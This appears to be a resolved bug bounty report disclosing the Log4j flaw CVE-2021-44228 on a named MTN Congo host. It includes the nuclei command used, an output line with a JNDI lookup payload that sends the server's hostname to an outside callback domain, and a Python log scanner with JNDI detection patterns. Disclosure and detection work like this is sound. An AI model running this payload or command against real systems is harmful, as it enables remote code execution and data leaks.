Remote code injection in Log4j on https://mymtn.mtncongo.net - CVE-2021-44228
Critical
Vulnerability Details
### Summary
Hello,
I would like to report this security flaw on https://mymtn.mtncongo.net. Using the nuclei script I found CVE-2021-44228. This is a critical issue because it allows remote command execution. In my test I just retrieved the hostname of the machine via the nuclei script. (https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)
### Steps To Reproduce
How to reproduce the issue:
1. Run the nuclei script from the command line: ./nuclei -u https://mymtn.mtncongo.net:8443 -t ../nuclei-templates/cves/2021/CVE-2021-44228.yaml
It will retrieve the hostname of the machine, shown in the output line marked "[net]", like this:
````
[2021-12-14 03:38:05] [CVE-2021-44228] [http] [critical] https://mymtn.mtncongo.net:8443/?x=${jndi:ldap://${hostName}.c6s11oscca8f9pc2lrggcghbdgeyyyd66.interact.sh/a} [net]
````
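A defender-side check for the request pattern shown above, as an added example that is not taken from the report or from nuclei: it scans access-log lines for Log4j JNDI lookups (plain or URL-encoded) and reports the callback host plus any nested lookups, such as ${hostName}, whose resolved value would be sent there. The log lines and the callback.example domain are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the report). The first has the
# shape of the probe shown above: a JNDI lookup in the query string whose
# callback host embeds a nested ${hostName} lookup. The second is the same
# class of request URL-encoded; the third is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Dec/2021:03:38:05 +0000] "GET /?x=${jndi:ldap://${hostName}.callback.example/a} HTTP/1.1" 200 512
203.0.113.5 - - [14/Dec/2021:03:38:06 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fa%7D HTTP/1.1" 200 512
198.51.100.7 - - [14/Dec/2021:03:39:00 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# Innermost ${...} lookups: Log4j resolves these before the JNDI lookup, so a
# ${hostName} or ${env:...} inside the callback host is the exfiltrated value.
INNER_LOOKUP_RE = re.compile(r"\$\{([^${}]+)\}")
# ${jndi:<scheme>://<host>...}; the host is read after nested lookups have been
# replaced by <name> placeholders so the whole callback name is captured.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|http)\s*:\s*/*([^/}:\s]+)", re.IGNORECASE)


def flatten(text):
    """Replace non-JNDI innermost lookups with <name> and list their names."""
    names = []

    def sub(m):
        if m.group(1).lower().startswith("jndi"):
            return m.group(0)
        names.append(m.group(1))
        return "<" + m.group(1) + ">"

    return INNER_LOOKUP_RE.sub(sub, text), names


def scan_line(line):
    """Return a finding for a line carrying a JNDI lookup, or None."""
    # Decode twice so %24%7B... and double-encoded payloads become visible.
    text, nested = flatten(unquote(unquote(line)))
    m = JNDI_RE.search(text)
    if not m:
        return None
    return {"client": line.split()[0], "scheme": m.group(1).lower(),
            "callback_host": m.group(2), "nested_lookups": nested}


def scan_log(log_text):
    """Scan every line of a log; return the list of findings."""
    return [f for f in map(scan_line, log_text.splitlines()) if f]
```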
### Mitigation
Update according to the vendor and technical references.
### References
https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability
https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476
## Impact
Remote command execution
## Report Stats
- Report ID: 1425565
- State: Closed
- Substate: resolved
- Upvotes: 25